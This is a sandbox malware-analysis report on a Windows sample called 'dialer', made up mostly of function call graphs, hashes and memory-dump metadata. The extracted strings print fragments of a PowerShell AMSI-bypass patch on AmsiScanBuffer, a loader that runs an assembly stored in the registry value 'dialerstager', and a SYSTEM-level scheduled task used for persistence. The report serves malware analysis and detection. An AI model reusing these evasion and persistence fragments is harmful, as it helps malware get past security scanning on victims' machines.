                                                          • Opcode ID: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                          • Instruction ID: 658d70ac06847e66f28a2d0f249079f86332a7380a0d8ff6d3d780845531e46c
                                                          • Opcode Fuzzy Hash: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                          • Instruction Fuzzy Hash: 91D09E62221AC4E5EF10EB44DCC93996375F79434CFD05513914D42975DF28CE5AD740
                                                          Function 000002D0165E1C34 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID:
                                                          • API String ID: 756756679-0
                                                          • Opcode ID: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                          • Instruction ID: e556eb9d7cf45c3ae5addaa2cbba678ff9c6794914bad821cf8ebc5cf65e5294
                                                          • Opcode Fuzzy Hash: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                          • Instruction Fuzzy Hash: 6E116921B01B9081EB14CBA6A84C659B7A1FB89FD1F99413ADE8D93735DF39D9828300
                                                          Function 000002D0165E1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                          • Instruction ID: 7075b9ab1f9578b1a8954e1e5d93993a35736c0889f75e175bd085a65b475d41
                                                          • Opcode Fuzzy Hash: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                          • Instruction Fuzzy Hash: 1CE06D3160169086E7048FA2DC4C749B7E1FB88F06F84C024C90D07361DF7DCC998760
                                                          Function 000002D0165E1000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                          • Instruction ID: 301ce8787f551722ef8a87cd9efdd85ec7c5a1b74a9ec493aa3a44b9c06d7179
                                                          • Opcode Fuzzy Hash: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                          • Instruction Fuzzy Hash: D0E0E571611AA086E7089BA2DC4C759B7A1FB88B16F888065C90907321EF388C998A20

                                                          Execution Graph

                                                          Execution Coverage:75.2%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:96
                                                          Total number of Limit Nodes:1
                                                          execution_graph 190 140001970 193 140001984 FindResourceExA 190->193 194 140001979 ExitProcess 193->194 195 1400019ae SizeofResource 193->195 195->194 196 1400019c3 LoadResource 195->196 196->194 197 1400019d7 LockResource RegOpenKeyExW 196->197 197->194 198 140001a0e RegSetValueExW 197->198 198->194 199 140001a34 198->199 209 140001a7c GetProcessHeap HeapAlloc StrCpyW 199->209 203 140001a48 204 1400017ec 9 API calls 203->204 205 140001a57 204->205 252 14000117c 7 API calls 205->252 207 140001a62 207->194 262 140001614 SysAllocString SysAllocString CoInitializeEx 207->262 272 14000114c GetModuleHandleA 209->272 212 140001b05 StrCatW StrCatW 275 140001c9c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 212->275 213 140001ad5 StrCatW StrCatW StrCatW 213->212 218 140001c0c 6 API calls 219 140001b4b 218->219 220 140001c0c 6 API calls 219->220 221 140001b5a 220->221 222 140001c0c 6 API calls 221->222 223 140001b69 222->223 224 140001c0c 6 API calls 223->224 225 140001b78 224->225 226 140001c0c 6 API calls 225->226 227 140001b87 226->227 228 140001c0c 6 API calls 227->228 229 140001b96 228->229 230 140001c0c 6 API calls 229->230 231 140001ba5 230->231 232 140001c0c 6 API calls 231->232 233 140001bb4 232->233 234 140001c0c 6 API calls 233->234 235 140001bc3 234->235 236 140001c0c 6 API calls 235->236 237 140001bd2 236->237 238 140001c0c 6 API calls 237->238 239 140001be1 238->239 240 140001c0c 6 API calls 239->240 241 140001bf0 240->241 242 140001c0c 6 API calls 241->242 243 140001a39 242->243 244 1400017ec SysAllocString SysAllocString CoInitializeEx 243->244 245 140001948 SysFreeString SysFreeString 244->245 246 14000182d CoInitializeSecurity 244->246 245->203 247 140001875 CoCreateInstance 246->247 248 140001869 246->248 249 140001942 CoUninitialize 247->249 250 1400018a4 VariantInit 247->250 248->247 248->249 249->245 251 1400018fa 250->251 251->249 253 14000120e CoInitializeSecurity 252->253 254 1400015c0 6 API calls 252->254 255 140001256 CoCreateInstance 253->255 256 14000124a 253->256 254->207 257 1400015ba CoUninitialize 255->257 258 140001287 VariantInit 255->258 256->255 256->257 257->254 260 1400012de 258->260 259 140001537 259->257 260->259 261 140001489 VariantInit VariantInit VariantInit 260->261 261->259 263 1400017c5 SysFreeString SysFreeString 262->263 264 140001655 CoInitializeSecurity 262->264 263->194 265 140001691 264->265 266 14000169d CoCreateInstance 264->266 265->266 267 1400017bf CoUninitialize 265->267 266->267 268 1400016cc VariantInit 266->268 267->263 269 140001722 268->269 270 14000175c VariantInit 269->270 271 14000178e 269->271 270->271 271->267 273 140001174 272->273 274 140001167 GetProcAddress 272->274 273->212 273->213 274->273 296 140001000 CryptAcquireContextW 275->296 278 140001b2d 289 140001c0c lstrlenW 278->289 279 140001d0d StrStrIW 280 140001f21 6 API calls 279->280 284 140001d2c 279->284 280->278 281 140001d2f StrStrIW StrNCatW StrCatW 282 140001edf StrCatW StrStrIW 281->282 281->284 282->281 283 140001f19 282->283 283->280 284->281 284->282 285 140001ebf StrCatW 284->285 286 140001e82 StrCatW StrNCatW 284->286 288 140001e5a StrCatW StrCatW 284->288 285->284 287 140001eae StrCatW 286->287 287->285 288->287 299 140001070 289->299 291 140001c45 292 140001c49 StrStrIW 291->292 293 140001b3c 291->293 292->293 294 140001c5a 292->294 293->218 295 140001c5d StrStrIW 294->295 295->293 295->295 297 140001039 CryptGenRandom CryptReleaseContext 296->297 298 14000105e 296->298 297->298 298->278 298->279 300 140001000 3 API calls 299->300 301 1400010ea 300->301 301->291 301->301

                                                          Callgraph

                                                          Executed Functions

                                                          Function 0000000140001000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32encryptionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000003F.00000002.2210644819.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000003F.00000002.2210602655.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000003F.00000002.2210680875.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000003F.00000002.2210680875.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: Crypt$Context$AcquireRandomRelease
                                                          • String ID: Microsoft Base Cryptographic Provider v1.0
                                                          • API String ID: 1815803762-291530887
                                                          • Opcode ID: 0ddbc8895b0669cb0ada80a9b3cf58f5140d61cb55c0be0e277e251b20bcd660
                                                          • Instruction ID: 74dd50a8ca20c1687fe1fd25669d783deb6ceb092ba3a030a89a64c3b25fe62d
                                                          • Opcode Fuzzy Hash: 0ddbc8895b0669cb0ada80a9b3cf58f5140d61cb55c0be0e277e251b20bcd660
                                                          • Instruction Fuzzy Hash: 28F01976700B4082E711CB67E88438AA7A2BBCCB80F498025DB5947729DEB4C956C740
                                                          Function 0000000140001C9C Relevance: 49.2, APIs: 22, Strings: 6, Instructions: 196memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000003F.00000002.2210644819.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000003F.00000002.2210602655.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000003F.00000002.2210680875.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000003F.00000002.2210680875.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Crypt$AllocContextFree$AcquireRandomRelease
                                                          • String ID: '+'$'+[Char]($)+'$0$gfff$gfff
                                                          • API String ID: 3510167801-2888743547
                                                          • Opcode ID: 4c029fa0796edbe0ffa46a87d68ca35ae0ec6b91dd14a689a3b9c7fb106a92b8
                                                          • Instruction ID: 860a95141ccdf47dad873dcb7fdad07428551a8c4d737b9ab5c8568f3082a9eb
                                                          • Opcode Fuzzy Hash: 4c029fa0796edbe0ffa46a87d68ca35ae0ec6b91dd14a689a3b9c7fb106a92b8
                                                          • Instruction Fuzzy Hash: 6A715CB2710B5696EB16DF67FC187D927A6FB89BC8F448025EE0A47B65DE38C509C300
                                                          Function 0000000140001A7C Relevance: 45.6, APIs: 8, Strings: 18, Instructions: 85memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000003F.00000002.2210644819.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000003F.00000002.2210602655.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000003F.00000002.2210680875.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000003F.00000002.2210680875.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: Heap$AddressAllocHandleModuleProcProcess
                                                          • String ID: AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`dialerstager`)).EntryPoint.I$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
                                                          • API String ID: 3242894177-3709903795
                                                          • Opcode ID: b1fc34ca39e6db4a99ca0f74ce53aae3f3c4af68fd0d05a2b9d2c7ccdd3fe5d3
                                                          • Instruction ID: 14a767466f4e457cf388ac16d0af6f49bf344e7045f9ae0e12022511aa144a10
                                                          • Opcode Fuzzy Hash: b1fc34ca39e6db4a99ca0f74ce53aae3f3c4af68fd0d05a2b9d2c7ccdd3fe5d3
                                                          • Instruction Fuzzy Hash: 38416BF8284702A1FA1BEF17B8557D52365A78DBC5F846261BE0A473B69EBCC108C394
                                                          Function 000000014000117C Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 281memorycomCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000003F.00000002.2210644819.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000003F.00000002.2210602655.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000003F.00000002.2210680875.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000003F.00000002.2210680875.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFree$InitVariant$Initialize$CreateInstanceSecurityUninitialize
                                                          • String ID: SYSTEM$dialersvc64$powershell
                                                          • API String ID: 3960698109-174983134
                                                          • Opcode ID: a180f732da29d2ef05bbba4c41d26df64929768de65ad4ca02d5ced4f3cbd646
                                                          • Instruction ID: aee36af91c86c83140a7f8fc7c4422115872d8a4c3e6ef38ff6a7da2a4766896
                                                          • Opcode Fuzzy Hash: a180f732da29d2ef05bbba4c41d26df64929768de65ad4ca02d5ced4f3cbd646
                                                          • Instruction Fuzzy Hash: 2DD1DE76604B8586EB11CF6AE8843DE67B1FB88B99F508116EF4E47B68DF39C149C700
                                                          Function 0000000140001614 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 121memorycomCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000003F.00000002.2210644819.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000003F.00000002.2210602655.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000003F.00000002.2210680875.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000003F.00000002.2210680875.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFreeInitInitializeVariant$CreateInstanceSecurityUninitialize
                                                          • String ID: dialersvc64
                                                          • API String ID: 2407135876-3881820561
                                                          • Opcode ID: 3c97e4c5619ef6fd9796c7cadf22d1dacbe7654f614efe6a853fd620db2a3c93
                                                          • Instruction ID: d87eb2bd9d729e9729409dc9478b0812213582aedf91d7913a1da9f61deadf9a
                                                          • Opcode Fuzzy Hash: 3c97e4c5619ef6fd9796c7cadf22d1dacbe7654f614efe6a853fd620db2a3c93
                                                          • Instruction Fuzzy Hash: B6510576704A458AEB11CF7AE8843DD63B1FB88B98F444226EF4E47A29DF38C149C340
                                                          Function 0000000140001984 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • FindResourceExA.KERNEL32(?,?,?,?,?,0000000140001979), ref: 000000014000199C
                                                          • SizeofResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019B3
                                                          • LoadResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019C8
                                                          • LockResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019DA
                                                          • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A04
                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A2A
                                                            • Part of subcall function 0000000140001A7C: GetProcessHeap.KERNEL32 ref: 0000000140001A85
                                                            • Part of subcall function 0000000140001A7C: HeapAlloc.KERNEL32 ref: 0000000140001A96
                                                            • Part of subcall function 0000000140001A7C: StrCpyW.SHLWAPI ref: 0000000140001AA9
                                                            • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001ADF
                                                            • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001AEF
                                                            • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001AFF
                                                            • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001B0F
                                                            • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001B1F
                                                            • Part of subcall function 00000001400017EC: SysAllocString.OLEAUT32 ref: 0000000140001802
                                                            • Part of subcall function 00000001400017EC: SysAllocString.OLEAUT32 ref: 0000000140001812
                                                            • Part of subcall function 00000001400017EC: CoInitializeEx.COMBASE ref: 000000014000181F
                                                            • Part of subcall function 00000001400017EC: CoInitializeSecurity.COMBASE ref: 0000000140001856
                                                            • Part of subcall function 00000001400017EC: CoCreateInstance.COMBASE ref: 0000000140001896
                                                            • Part of subcall function 00000001400017EC: VariantInit.OLEAUT32 ref: 00000001400018A8
                                                            • Part of subcall function 00000001400017EC: CoUninitialize.COMBASE ref: 0000000140001942
                                                            • Part of subcall function 00000001400017EC: SysFreeString.OLEAUT32 ref: 000000014000194B
                                                            • Part of subcall function 00000001400017EC: SysFreeString.OLEAUT32 ref: 0000000140001954
                                                            • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011A7
                                                            • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011B7
                                                            • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011C7
                                                            • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011D3
                                                            • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011E3
                                                            • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011F3
                                                            • Part of subcall function 000000014000117C: CoInitializeEx.COMBASE ref: 0000000140001200
                                                            • Part of subcall function 000000014000117C: CoInitializeSecurity.COMBASE ref: 0000000140001237
                                                            • Part of subcall function 000000014000117C: CoCreateInstance.COMBASE ref: 0000000140001279
                                                            • Part of subcall function 000000014000117C: VariantInit.OLEAUT32 ref: 000000014000128B
                                                            • Part of subcall function 0000000140001614: SysAllocString.OLEAUT32 ref: 000000014000162A
                                                            • Part of subcall function 0000000140001614: SysAllocString.OLEAUT32 ref: 000000014000163A
                                                            • Part of subcall function 0000000140001614: CoInitializeEx.OLE32 ref: 0000000140001647
                                                            • Part of subcall function 0000000140001614: CoInitializeSecurity.COMBASE ref: 000000014000167E
                                                            • Part of subcall function 0000000140001614: CoCreateInstance.COMBASE ref: 00000001400016BE
                                                            • Part of subcall function 0000000140001614: VariantInit.OLEAUT32 ref: 00000001400016D0
                                                            • Part of subcall function 0000000140001614: VariantInit.OLEAUT32 ref: 0000000140001760
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000003F.00000002.2210644819.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000003F.00000002.2210602655.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000003F.00000002.2210680875.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000003F.00000002.2210680875.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: String$Alloc$Initialize$InitResourceVariant$CreateInstanceSecurity$FreeHeap$FindLoadLockOpenProcessSizeofUninitializeValue
                                                          • String ID: EXE$SOFTWARE$dialerstager$dialersvc32$dialersvc64
                                                          • API String ID: 2204944113-1859800454
                                                          • Opcode ID: 26ae1522833f5bd9fa9188c5454cc5176b5189f098da63ea7365dd9a7c369b54
                                                          • Instruction ID: 1bfe2c02107bc6537b2911a47a34f854c4b6e53c22e939ebebcbb702dcfd335c
                                                          • Opcode Fuzzy Hash: 26ae1522833f5bd9fa9188c5454cc5176b5189f098da63ea7365dd9a7c369b54
                                                          • Instruction Fuzzy Hash: D5213BBA30570152EA26DF63B8143E963A1AB8DBD0F484125FB49477BAEF3CC604C600
                                                          Function 00000001400017EC Relevance: 13.6, APIs: 9, Instructions: 100memorycomCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000003F.00000002.2210644819.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000003F.00000002.2210602655.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000003F.00000002.2210680875.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000003F.00000002.2210680875.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                          • String ID:
                                                          • API String ID: 4184240511-0
                                                          • Opcode ID: 28fc60779f0ad9d62090849b4b365cf4f04873247535d29ba999af650a69468a
                                                          • Instruction ID: 67cbc857c72eec62a5b69ac69888ab56890e3342390bd1f27bc6256027a28dd6
                                                          • Opcode Fuzzy Hash: 28fc60779f0ad9d62090849b4b365cf4f04873247535d29ba999af650a69468a
                                                          • Instruction Fuzzy Hash: 5E413972704A458AEB11CF7AE8543DD73B1FB89B99F449226AF4A47A69DF38C149C300
                                                          Function 0000000140001C0C Relevance: 3.8, APIs: 3, Instructions: 40stringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 168 140001c0c-140001c47 lstrlenW call 140001070 171 140001c49-140001c58 StrStrIW 168->171 172 140001c7c-140001c99 168->172 171->172 173 140001c5a 171->173 174 140001c5d-140001c7a StrStrIW 173->174 174->172 174->174
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000003F.00000002.2210644819.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000003F.00000002.2210602655.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000003F.00000002.2210680875.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000003F.00000002.2210680875.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: lstrlen
                                                          • String ID:
                                                          • API String ID: 1659193697-0
                                                          • Opcode ID: b9962e4e84025f74c7544eb618daec881cae5e6da44291651d3163d6fd35675d
                                                          • Instruction ID: 09bf7b72404f13f14ced639d6c0c6f67ee10a0461fa6ddbcf4aeef183f1f47ff
                                                          • Opcode Fuzzy Hash: b9962e4e84025f74c7544eb618daec881cae5e6da44291651d3163d6fd35675d
                                                          • Instruction Fuzzy Hash: 9B0116B6344B8185EA66CF13A804BA963AAF78CFC0F598131AE4D83765DF38D946C740
                                                          Function 0000000140001970 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 175 140001970-14000197b call 140001984 ExitProcess
                                                          APIs
                                                            • Part of subcall function 0000000140001984: FindResourceExA.KERNEL32(?,?,?,?,?,0000000140001979), ref: 000000014000199C
                                                            • Part of subcall function 0000000140001984: SizeofResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019B3
                                                            • Part of subcall function 0000000140001984: LoadResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019C8
                                                            • Part of subcall function 0000000140001984: LockResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019DA
                                                            • Part of subcall function 0000000140001984: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A04
                                                            • Part of subcall function 0000000140001984: RegSetValueExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A2A
                                                          • ExitProcess.KERNEL32 ref: 000000014000197B
                                                          Memory Dump Source
                                                          • Source File: 0000003F.00000002.2210644819.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000003F.00000002.2210602655.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000003F.00000002.2210680875.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000003F.00000002.2210680875.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: Resource$ExitFindLoadLockOpenProcessSizeofValue
                                                          • String ID:
                                                          • API String ID: 3836967525-0
                                                          • Opcode ID: ee2a5ee51357348344ca81a4be59069b68ca976694f2d9a0ce0cc3fee0d6cd3e
                                                          • Instruction ID: 591ae2b672e41714171671f8838f177bfce947d6885aae7fa81f753db4d17b5a
                                                          • Opcode Fuzzy Hash: ee2a5ee51357348344ca81a4be59069b68ca976694f2d9a0ce0cc3fee0d6cd3e
                                                          • Instruction Fuzzy Hash: 71A011B0A00A8082EA0ABBB2282A3E802200B88380F000000A202032A2CC38008A8A00

                                                          Non-executed Functions

                                                          Function 000000014000114C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 11libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 187 14000114c-140001165 GetModuleHandleA 188 140001174-140001178 187->188 189 140001167-14000116e GetProcAddress 187->189 189->188
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000003F.00000002.2210644819.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000003F.00000002.2210602655.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000003F.00000002.2210680875.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000003F.00000002.2210680875.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: RtlGetVersion$ntdll.dll
                                                          • API String ID: 1646373207-1489217083
                                                          • Opcode ID: cbe8274689d4b13bee11112ce4758f47015ade9fc57dadff247276a17ec4a5cd
                                                          • Instruction ID: 59613ef8418529ec4bc26aae3d36b02baf67a4f8cd1ada14fad478f70e9913c3
                                                          • Opcode Fuzzy Hash: cbe8274689d4b13bee11112ce4758f47015ade9fc57dadff247276a17ec4a5cd
                                                          • Instruction Fuzzy Hash: 8CD0E9F5622A01E1EA0BEB57FC553D512617B5C781F804521E70A43671EF3C8659C700

                                                          Execution Graph

                                                          Execution Coverage:1.3%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:1408
                                                          Total number of Limit Nodes:9
